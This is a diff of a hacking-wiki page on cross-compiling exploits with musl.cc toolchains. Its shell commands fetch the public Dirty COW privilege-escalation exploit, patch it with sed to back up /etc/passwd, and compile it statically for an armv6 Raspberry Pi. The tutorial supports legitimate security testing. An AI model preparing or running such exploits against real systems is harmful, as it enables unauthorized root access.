RakhithJK/hackerschoice-kb-wiki/Statically-Cross-Compiling-Expoits.md

 ## Using muslcc toolchain

 The fine folks at https://musl.cc/ maintain cross-compiler toolchains for many different architectures.

-These toolchains can be used to generate a (static) Linux binary that will execute on a different architecture (armv6l) than the architecture for compiling the exploit (x86_64):
+These toolchains can be used to generate a (static) Linux binary for a different architecture than the architecture used for compiling the exploit (x86_64):

-There is a bug in the reference exploit.
-Let's download and fix this first:
+Firstly, there is a bug in the reference exploit.
+Let's fix this first:
 ```shell
 mkdir thc; cd thc
 wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
 sed  -i 'sX.*= copy_file.*Xint ret = system("cp /etc/passwd /tmp/passwd.bak");X' dirty.c
 ```

-And now compile dirt.c for Linux with armv6 architecture on our MacOS (x84_64):
+Next: Compile dirt.c for Linux for armv6 architecture on our MacOS (x84_64):
 ```shell
 docker run --rm -v $(pwd):/src -w /src muslcc/x86_64:armv6-linux-musleabi sh -c "gcc -pthread dirty.c -o dirty-exp -lcrypt -static"
 ```

-The `./dirty` binary will execute on the Raspberry PI Linux (armv6l).
+The newly created `./dirty-exp` binary will execute on a Raspberry Pi Linux (armv6l).

 ## Cross Compiling for 5 architectures